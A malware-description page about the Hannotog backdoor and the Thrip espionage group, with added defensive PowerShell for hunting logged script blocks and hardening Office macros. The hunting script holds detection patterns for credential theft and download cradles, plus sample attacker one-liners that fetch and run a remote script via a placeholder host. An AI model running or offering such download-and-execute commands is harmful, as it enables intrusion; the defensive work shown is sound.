Posted: March 30, 2020

Hannotog Description

Hannotog is a backdoor Trojan deployed by Thrip, a China-based espionage group. It lets attackers control compromised computers by executing system commands, and its at-risk targets include government, military and communications networks in Asia. Because Hannotog shows few symptoms and may go unnoticed by users while present, rely on reputable anti-malware products to detect and remove it.

Backdoors Cracking Open in the Most Threatening of Places

While poorly secured Trojan campaigns may expose themselves almost immediately, as some botnets do, state-sponsored intrusions are another matter. Thrip, a specialized China-based group that appears to be a sub-group of the Billbug espionage actor, uses the Hannotog backdoor alongside other tools, both legitimate administration software and custom malware, to reach its goals. With Hannotog, it has been doing so successfully for three years running.

Since 2017, campaigns using Hannotog have gained access to the networks of satellite communications operators, governments and their military branches, with a regional focus on Southeast Asian nations such as Indonesia and Vietnam. Thrip's preferred infection vector is e-mail, in the form of spear-phishing lures carrying malicious attachments or links, with occasional watering-hole attacks that compromise a legitimate website in order to infect its visitors. The payload often extends beyond Hannotog: malware analysts also document Catchamas, an information stealer, and Sagerunex, a second backdoor Trojan, being dropped alongside it.

Hannotog is a custom Trojan used solely by Thrip, and its role is to give the attackers long-term persistence on a compromised system. It works alongside Sagerunex, which provides broader remote access, and Catchamas, which harvests passwords and other credentials for account hijacking. Users should assume Hannotog is as capable as comparable backdoor Trojans at basic attack tasks such as executing system commands, transferring files, or disabling security features and tools like the Task Manager.

The Open Doors Leading to Invisible Drafts

One aspect of Hannotog's deployment should concern anyone who relies too heavily on signature-based detection such as conventional anti-virus scanners. Thrip frequently "lives off the land," abusing built-in and dual-use software such as Windows PowerShell (so-called LOLBins, living-off-the-land binaries). This lets the attackers control systems and accounts without placing Hannotog or a similar Trojan on every machine, leaving little for file-based detection to find. The tactic is well suited to maintaining surveillance in military networks and other environments with strict rules about allowed files, network traffic and software, where a dropped executable would stand out but an administrator's own tool would not.
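Because living-off-the-land activity leaves no malicious file to scan, the practical counter is to log what PowerShell actually executes and hunt those logs. The following is an added example written for this page, not code from the original article or from any published Thrip research: it turns on PowerShell Script Block Logging (event ID 4104), defines a handful of indicator patterns typical of attacker-style invocations, and runs them over three constructed sample script blocks before applying the same check to real events. The pattern set and the sample strings are assumptions chosen for illustration; tune them to your environment.

```powershell
# Added example (not from the original article): hunting "living off the land" PowerShell use.
# Requires Windows PowerShell 5.1 or later; enabling logging needs an elevated shell.

# 1. Enable Script Block Logging (events 4104 in Microsoft-Windows-PowerShell/Operational).
#    This is the registry value behind the Group Policy setting of the same name.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

# 2. Indicator patterns (assumed, not exhaustive). Each is a regex over the logged script text;
#    -match is case-insensitive by default, so casing tricks do not evade them.
$SuspiciousPatterns = @{
    'encoded command'     = '-\s*(e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
    'download cradle'     = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer'
    'in-memory execution' = '\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load|FromBase64String'
    'hidden window'       = '-w(indowstyle)?\s+hidden'
    'credential access'   = 'Invoke-Mimikatz|sekurlsa|lsass'
}

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$Text)
    $hits = foreach ($name in $SuspiciousPatterns.Keys) {
        if ($Text -match $SuspiciousPatterns[$name]) { $name }
    }
    [pscustomobject]@{ Suspicious = [bool]$hits; Indicators = @($hits); Text = $Text }
}

# 3. Constructed sample script blocks, standing in for the ScriptBlockText of 4104 events:
#    one routine administrative command and two attacker-style one-liners.
$Samples = @(
    'Get-Service | Where-Object Status -eq Running | Sort-Object Name',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'
)
$Samples | ForEach-Object { Test-SuspiciousScriptBlock -Text $_ } | Format-Table Suspicious, Indicators

# 4. The same check against real events once logging is enabled (default: last 24 hours).
function Get-SuspiciousScriptBlockEvents {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # For event 4104, Properties[2] carries the ScriptBlockText
        $result = Test-SuspiciousScriptBlock -Text $_.Properties[2].Value
        if ($result.Suspicious) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Indicators = ($result.Indicators -join ', ')
                Text       = $result.Text
            }
        }
    }
}
```

Run on the constructed samples, the first line reports no indicators while the second is flagged for the encoded command and hidden window and the third for the download cradle and in-memory execution. Logging only the command line is not enough against these attacks, because an encoded or downloaded payload is decoded in memory; script block logging records the text PowerShell compiles, after decoding, which is why the 4104 channel is the one worth hunting.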

Users should prevent Hannotog infections and the attacks that accompany them by scrutinizing e-mail attachments and links and the websites they visit. Keeping software patched removes the vulnerabilities Thrip would otherwise exploit, and disabling features like Flash, JavaScript and document macros further limits the opportunities for drive-by downloads. Expect targeted content: victims may receive custom-crafted lures that reference their workplace or industry.
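Of the mitigations listed above, document macros are the one most directly relevant to the phishing attachments Thrip favours, and they can be locked down centrally. The following is an added example for this page, not code from the original article: it sets the registry values behind the Office Group Policy settings "Block macros from running in Office files from the Internet" and "VBA Macro Notification Settings" for Word, Excel and PowerPoint, then reads them back so the result can be audited. It assumes Office 2016, 2019 or Microsoft 365 Apps (version key 16.0) and per-user policy scope; the application list and the chosen notification level are assumptions.

```powershell
# Added example (not from the original article): hardening Office document macros.
# Assumes Office version key 16.0 (Office 2016/2019/Microsoft 365 Apps) and HKCU policy scope.

$OfficeApps    = 'Word', 'Excel', 'PowerPoint'
$OfficeVersion = '16.0'

function Set-OfficeMacroPolicy {
    param(
        # VBAWarnings: 3 = disable all macros except digitally signed, 4 = disable all without notification.
        # The default Office behaviour ("disable with notification", value 2) is what phishing lures rely on:
        # the user is offered an "Enable Content" button.
        [ValidateSet(3, 4)][int]$VbaWarnings = 3
    )
    foreach ($app in $OfficeApps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # Documents carrying the Mark of the Web (downloaded or from e-mail): block macros outright
        Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord
        # All other documents: signed macros only (3) or none at all (4)
        Set-ItemProperty -Path $key -Name 'VBAWarnings' -Value $VbaWarnings -Type DWord
    }
}

function Get-OfficeMacroPolicy {
    foreach ($app in $OfficeApps) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        [pscustomobject]@{
            App                 = $app
            BlockInternetMacros = ($props.blockcontentexecutionfrominternet -eq 1)
            VBAWarnings         = $props.VBAWarnings
            # Hardened only when both controls are in place
            Hardened            = ($props.blockcontentexecutionfrominternet -eq 1) -and ($props.VBAWarnings -ge 3)
        }
    }
}

# Apply, then audit. Office reads these policy values on start, so reopen any running Office apps.
Set-OfficeMacroPolicy -VbaWarnings 3
Get-OfficeMacroPolicy | Format-Table
```

In a managed environment the same values would normally be pushed through Group Policy rather than set per machine; the script is useful for verifying that the policy actually landed, since a missing or stale value shows up as Hardened = False in the audit output.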

As always, professional anti-malware products have the best chance of safely removing Hannotog and similar backdoor Trojans from already-infected computers. The Trojan itself is Windows-specific, although its deployment has broad implications for any connected devices and the networks they share.

Hannotog is a backdoor Trojan whose payload includes features not yet available for in-depth analysis. What is already clear is that it is another piece of espionage software that monitors foreign computer networks on behalf of China, or of a threat actor that wishes to appear to be doing so.

Use SpyHunter to Detect and Remove PC Threats

If you are concerned that malware or PC threats similar to Hannotog may have infected your computer, we recommend you start an in-depth system scan with SpyHunter. SpyHunter is an advanced malware protection and remediation application that offers subscribers a comprehensive method for protecting PCs from malware, in addition to providing one-on-one technical support service.

Download SpyHunter's Malware Scanner

Note: SpyHunter's free version is only for malware detection. If SpyHunter detects malware on your PC, you will need to purchase SpyHunter's malware tool to remove the malware threats. Learn more on SpyHunter. If you would like to uninstall SpyHunter for any reason, please follow these uninstall instructions. To learn more about our policies and practices, visit our EULA, Privacy Policy and Threat Assessment Criteria.

Why can't I open any program including SpyHunter? You may have a malware file running in memory that kills any programs that you try to launch on your PC. Tip: Download SpyHunter from a clean computer, copy it to a USB thumb drive, DVD or CD, then install it on the infected PC and run SpyHunter's malware scanner.
